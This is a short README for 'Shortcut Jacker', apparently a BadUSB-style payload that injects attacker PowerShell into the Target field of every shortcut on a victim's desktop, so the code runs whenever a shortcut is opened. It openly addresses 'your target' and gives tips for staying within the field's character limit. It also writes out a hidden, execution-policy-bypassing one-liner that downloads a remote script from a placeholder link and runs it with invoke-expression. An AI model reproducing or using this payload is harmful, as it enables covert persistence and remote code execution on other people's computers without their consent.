5.1 KiB
Table of Contents
Shortcut Jacker
YouTube Tutorial
A script used to embed malware in the shortcut on your targets desktop
Description
This payload will run a powershell script in the background of any shortcut used on the targets desktop
This is done by taking advantage of the Target field where powershell commands can be stored or run.
This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the $code variable and it will still run.
So if your command exceeds that consider using an IWR function to download and execute a longer script.
I have an Invoke WebRequest tutorial for that HERE
Inside the .ps1 file you will find a line at the beginning with a $code variable. This is where the powershell code you want executed is stored.
Using the Get-Shortcut function we will get the following information we can then use to maintain the integrity of the appearance of the shortcut after manipulating the Target field.
Getting Started
Once the script is executed all of the shortcuts on your target's desktop will be infected with the powershell code you have stored in the $code variable in the .ps1 file
Dependencies
- An internet connection
- Windows 10,11
Executing program
- Plug in your device
- Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
Contributing
All contributors names will be listed here
I am Jakoby
Version History
- 0.1
- Initial Release
Contact
📱 My Socials 📱
YouTube |
|
|
Discord |
Acknowledgments
